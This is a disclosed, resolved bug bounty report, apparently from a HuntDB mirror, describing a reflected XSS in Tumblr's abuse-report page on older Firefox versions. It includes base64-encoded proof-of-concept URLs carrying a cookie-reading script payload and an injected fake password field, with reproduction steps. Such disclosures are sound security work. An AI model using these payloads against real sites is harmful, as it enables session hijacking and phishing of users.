Loading HuntDB...

[tumblr.com] 69< Firefox Only XSS Reflected

Medium
A
Automattic
Submitted None
Reported by fuzzme

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
Description : Hello, i have found a XSS Reflected in https://www.tumblr.com/abuse/start?prefill=<base64> But the XSS only works in versions of firefox that are below 70. Because its been blocked by CSP, but the version below 69 of firefox is vulnerable. Here's a great article about this subject https://portswigger.net/daily-swig/firefox-vulnerable-to-trivial-csp-bypass But CSP dont block HTML tag in the lastest version of all navigators Vulnerable Url : https://www.tumblr.com/abuse/start?prefill=eyJwb3N0IjpudWxsLCJ1cmxyZXBvcnRpbmciOiJodHRwczovL2Z1enptZS50dW1ibHIuY29tLyIsInR1bWJsZWxvZyI6IjxvYmplY3QgZGF0YT1cImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuY29va2llKVwiPiIsImNvbnRleHQiOiJibG9nIn0= Payload : <object data=\"blocked:alert(document.cookie)\"> Vulnerable Parameter : /\ Note you must decode the $_GET['prefill'], this is encoding is in base64 /\ After decoded it, you can see this {"post":null,"urlreporting":"https://fuzzme.tumblr.com/","tumblelog":"<object data=\"blocked:alert(document.cookie)\">","context":"blog"} The array value of tumblelog is reflected into the HTML this him who as vulnerable The array value of tumblelog is the vulnerable array value Steps To Reproduce for XSS Only Firefox : 1. Download firefox 69 at https://ftp.mozilla.org/pub/firefox/releases/69.0/ 2. Go to login in your Tumblr account 3. Click to this link, and you will see XSS pop-up LINK : https://www.tumblr.com/abuse/start?prefill=eyJwb3N0IjpudWxsLCJ1cmxyZXBvcnRpbmciOiJodHRwczovL2Z1enptZS50dW1ibHIuY29tLyIsInR1bWJsZWxvZyI6IjxvYmplY3QgZGF0YT1cImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuY29va2llKVwiPiIsImNvbnRleHQiOiJibG9nIn0= Steps To Reproduce for HTML injection : 1. Go to login in your Tumblr account 2. Click to this link https://www.tumblr.com/abuse/start?prefill=eyJwb3N0IjpudWxsLCJ1cmxyZXBvcnRpbmciOiJodHRwczovL2Z1enptZS50dW1ibHIuY29tLyIsInR1bWJsZWxvZyI6IjxpbnB1dCB0eXBlPSd0ZXh0JyBwbGFjZWhvbGRlcj0nRW50ZXIgeW91IHBhc3N3b3JkJz4iLCJjb250ZXh0IjoiYmxvZyJ9 3. And you will see a HTML input with `enter your password` POC: The attachment video ## Impact The vulnerability allow a malicious user to inject html tags and execute Javascript which could lead to steal user's session, and performing phishing.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected